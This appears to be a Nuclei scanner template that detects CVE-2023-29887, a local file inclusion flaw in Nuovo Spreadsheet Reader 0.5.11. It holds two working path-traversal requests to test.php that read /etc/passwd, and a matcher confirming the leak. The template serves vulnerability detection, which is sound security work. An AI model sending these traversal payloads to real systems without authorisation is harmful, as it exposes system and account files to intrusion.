nuclei-templates/http/cves/2023/CVE-2023-29887.yaml

40 lines
1.3 KiB
YAML
Raw Normal View History

2023-05-24 18:08:59 +00:00
id: CVE-2023-29887
info:
name: Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion
author: ctflearner
severity: high
description: |
A Local File inclusion vulnerability in test.php in spreadsheet-reader 0.5.11 allows remote attackers to include arbitrary files via the File parameter.
2023-05-24 18:12:07 +00:00
reference:
- https://research.hisolutions.com/2023/01/arbitrary-file-read-vulnerability-php-library-nuovo-spreadsheet-reader-0-5-11/
2023-05-24 18:08:59 +00:00
- https://github.com/nuovo/spreadsheet-reader/issues/169
- https://nvd.nist.gov/vuln/detail/CVE-2023-29887
2023-05-24 18:12:07 +00:00
classification:
2023-05-24 18:08:59 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-29887
cwe-id: CWE-22
cpe: cpe:2.3:a:nuovo:spreadsheet-reader:0.5.11:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-06-04 08:13:42 +00:00
verified: true
2023-05-24 18:08:59 +00:00
tags: cve,cve2023,nuovo,spreadsheet-reader,lfi
http:
- method: GET
path:
- "{{BaseURL}}/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd"
2023-05-24 18:12:07 +00:00
- "{{BaseURL}}/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd"
2023-05-24 18:08:59 +00:00
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200